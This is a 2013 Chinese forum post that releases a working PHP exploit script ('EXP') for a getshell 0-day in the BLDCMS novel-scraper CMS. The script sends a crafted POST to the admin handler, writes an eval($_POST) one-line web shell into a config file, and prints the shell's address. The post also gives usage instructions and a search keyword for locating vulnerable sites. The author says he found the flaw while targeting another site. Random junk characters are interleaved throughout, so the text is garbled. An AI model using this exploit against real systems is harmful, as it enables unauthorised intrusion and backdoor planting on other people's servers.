之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞/ r6 p! c- g# t m0 B8 h3 J; Z
! W& Z. y5 m$ m$ o2 t6 u- ] 9 z6 Z6 w; n- B) J2 T- W/ Y
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
5 @0 j$ k0 n: T. P1 k 0 M# B! l" k o/ s/ `
既然都有人发了 我就把我之前写好的EXP放出来吧% }1 |" e. X' U7 \
, c' X, g" i% F" ]8 \2 w {
view source print?01.php;">
# P& J: M5 E& [) T) p( e( M+ P/ e. ^02.<!--?php
& I; { K0 S9 [0 G6 J* B03.echo "-------------------------------------------------------------------
8 [/ D+ k5 d' t# R1 T* B04. / T: U! ^" e, n1 c, } c
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP; D: p/ w8 F" i- J) R& k7 @
06.
# u8 F5 L$ Q" ^2 E07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
1 ]* \: a. e- [5 ]1 h# B" f/ T$ a08. , | h: M$ y3 t6 s8 d
09.QQ:981009941\r\n 2013.3.21\r\n 7 T, |% f: _9 a0 ^
10.
' c; n% n) S1 V' r# e11. 4 U! |. b/ s9 Q) L
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
8 F F1 d1 \9 b& P13.
3 q( @! V4 G% I14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------9 P/ ]& m- k n% r/ l
15.
9 ^( \% b1 D% k0 ?8 e. Y- i16.--------------------------------------------------------------------\r\n";
7 P: p& }# E# N; t7 o17.$url=$argv[1];
$ Y+ P' Q% h V% s18.$dir=$argv[2];
' }7 b0 V M" W- k `" M19.$pass=$argv[3];
0 D$ b7 x4 F4 Y \/ L20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';8 F- }7 Q; r# _ y
21.if (emptyempty($pass)||emptyempty($url))
& ?6 E* W8 M1 T* i22.{exit("请输入参数");}
8 M9 i0 W% A2 y2 o23.else5 E4 G7 Q1 U/ q7 k. S
24.{
; G/ U' {% }* h25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev$ P9 {+ `" M& [1 f" U7 @; F+ ]! k
26. ) Y% x( h& g8 V( u( |
27.al;
8 Q" ^. n( O7 }, Q$ U* Y O. f28.$length = strlen($fuckdata);& p* s, }. D& c) Y2 D7 ^3 Q
29.function getshell($url,$pass): P0 B% g8 k0 X3 u3 s8 K+ e
30.{4 p0 L# t3 L# A& [6 t. e
31.global $url,$dir,$pass,$eval,$length,$fuckdata;
+ d% |4 N2 C; f32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";$ h- G/ j# ^# @# ^4 S
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";- M1 E: \3 m, ^0 s& x. F
34.$header .= "User-Agent: MSIE\r\n";8 H9 L$ c" h0 y
35.$header .= "Host:".$url."\r\n";# Z2 @' F, J& F# m! ~
36.$header .= "Content-Length: ".$length."\r\n";0 X" y3 u+ _6 F6 _5 D' ]
37.$header .= "Connection: Close\r\n";) V e3 ^7 Q0 ], s: P$ F1 M
38.$header .="\r\n";% o q8 t6 |& ~3 \, k
39.$header .= $fuckdata."\r\n\r\n";/ y8 z: ]9 Y E0 e0 O
40.$fp = fsockopen($url, 80,$errno,$errstr,15);' X8 c5 I! G% j/ x* w# t
41.if (!$fp)
# y+ ^5 U1 v7 Q3 V) v42.{: k: n4 C! g6 @4 Y
43.exit ("利用失败:请检查指定目标是否能正常打开");1 K3 t; f8 l8 `. F% }3 W
44.}
, p. x% X7 T0 S5 N4 R45.else{ if (!fputs($fp,$header))
2 H6 E9 {' a3 f9 i, r! C46.{exit ("利用失败");}
9 X6 S( c5 I8 M0 L( u$ w47.else' h% K/ B+ d7 _) J! F7 Y
48.{
2 c: ^. K1 F8 D" h/ B, K, P+ J49.$receive = '';) o( f( S1 Q6 M4 ^+ p! {) p
50.while (!feof($fp)) {" u! ]$ o- o' y' s' j9 z0 @3 i
51.$receive .= @fgets($fp, 1000);
) g: U/ O) z6 }6 P7 a52.}
3 w! }- W$ m5 C* Q3 b53.@fclose($fp);
& z; B, P# B/ A: A54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标6 M5 n$ w. H1 ^; [/ p$ Q
55. ( L( a4 n( y3 [
56.GPC是否=off)";
9 R8 @* k" O( R" r& V9 n57.}}
" V( ?/ @1 r4 V% j0 @5 f58.}
, r0 C8 X; u) n% W/ n4 P& o o59.}
) ^/ X3 A) p' J& a: Y60.getshell($url,$pass);( N1 V; z+ f/ O5 V; P. {
61.?-->
) I% a% @3 i7 {* _ 8 z: f% F: D+ ]( W
' {" U& n0 R: F( U
8 R5 ]' j0 O/ r% `) p) R6 pby 数据流
! Y3 ~, Y: }, D7 y% W |
发表于 2013-3-26 20:49:10
收藏
支持
反对